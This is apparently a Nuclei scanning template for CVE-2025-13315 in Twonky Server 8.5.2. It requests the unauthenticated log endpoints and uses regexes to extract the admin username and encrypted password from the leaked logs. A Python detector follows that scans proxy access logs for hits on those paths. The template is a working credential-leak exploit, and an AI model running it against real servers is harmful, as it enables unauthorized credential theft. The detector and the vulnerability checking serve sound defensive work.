```yaml
id: CVE-2025-13315

info:
  name: Twonky Server 8.5.2 - Unauthenticated Log File Leak (CVE-2025-13315)
  author: 0xBlackash
  severity: critical
  description: |
    An unauthenticated attacker can access /nmc/rpc/log_getfile and retrieve application logs containing the admin username and encrypted password.
  reference:
    - https://www.rapid7.com/blog/post/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-13315
  tags: cve,cve2025,twonky,log-leak,unauth,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/nmc/rpc/log_getfile"
      - "{{BaseURL}}/rpc/log_getfile"

    # All three matchers below must pass.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: dsl
        dsl:
          - "len(body) > 50000" # Most Twonky logs are large (340KB in the observed case)
          - "duration < 10" # Quick response
        condition: and # require both checks; a matcher's default condition is "or"

      # Any one of these strings in the body is enough.
      - type: word
        words:
          - "Twonky"
          - "Media Server"
          - "accessuser"
          - "accesspwd"
          - "||"
        condition: or
        part: body
        case-insensitive: true

    # Pull the leaked credential fields out of the returned log.
    extractors:
      - type: regex
        name: username
        regex:
          - '(?i)(?:accessuser|username|admin)\s*[:=]\s*([^\s\r\n]+)'
        part: body

      - type: regex
        name: encrypted_password
        regex:
          - '(?i)(?:accesspwd|password)\s*[:=]\s*([^\s\r\n]+)'
        part: body

      - type: regex
        name: encrypted_hex
        regex:
          - '\|\|([0-9a-fA-F]{16,})'
        part: body
```
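
A defender-side counterpart to the template above, added here as an example and not part of the original repository: it scans reverse-proxy access logs for successful requests to the two `log_getfile` paths and marks responses larger than the template's 50000-byte threshold. The Combined Log Format input, the function name `find_log_getfile_hits` and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# The two paths requested by the template above.
LEAK_PATHS = ("/nmc/rpc/log_getfile", "/rpc/log_getfile")
# Same size heuristic the template uses for "this looks like a full log file".
LARGE_BODY = 50000

# Assumed input: Common/Combined Log Format lines from a proxy in front of Twonky.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_log_getfile_hits(lines):
    """Return {client_ip: [hit, ...]} for 200 responses from the log endpoint."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed or non-HTTP line
        # Drop the query string and collapse duplicate slashes before comparing.
        path = re.sub(r"/{2,}", "/", m["target"].split("?", 1)[0])
        if path not in LEAK_PATHS or m["status"] != "200":
            continue
        size = 0 if m["size"] == "-" else int(m["size"])
        hits[m["ip"]].append(
            {"ts": m["ts"], "path": path, "bytes": size, "likely_leak": size > LARGE_BODY}
        )
    return dict(hits)

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE = [
    '192.0.2.10 - - [12/Nov/2025:10:01:02 +0000] "GET /nmc/rpc/log_getfile HTTP/1.1" 200 348160 "-" "curl/8.5.0"',
    '192.0.2.10 - - [12/Nov/2025:10:01:05 +0000] "GET /rpc/log_getfile HTTP/1.1" 200 348160 "-" "curl/8.5.0"',
    '198.51.100.7 - - [12/Nov/2025:10:02:00 +0000] "GET /nmc/rpc/log_getfile HTTP/1.1" 401 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Nov/2025:10:02:03 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Nov/2025:10:03:00 +0000] "GET //rpc/log_getfile?x=1 HTTP/1.1" 200 1200 "-" "-"',
]

if __name__ == "__main__":
    for ip, found in find_log_getfile_hits(SAMPLE).items():
        print(ip, found)
```

Any client listed with `likely_leak` set has probably received the full log, so the admin credentials in it should be treated as exposed and rotated.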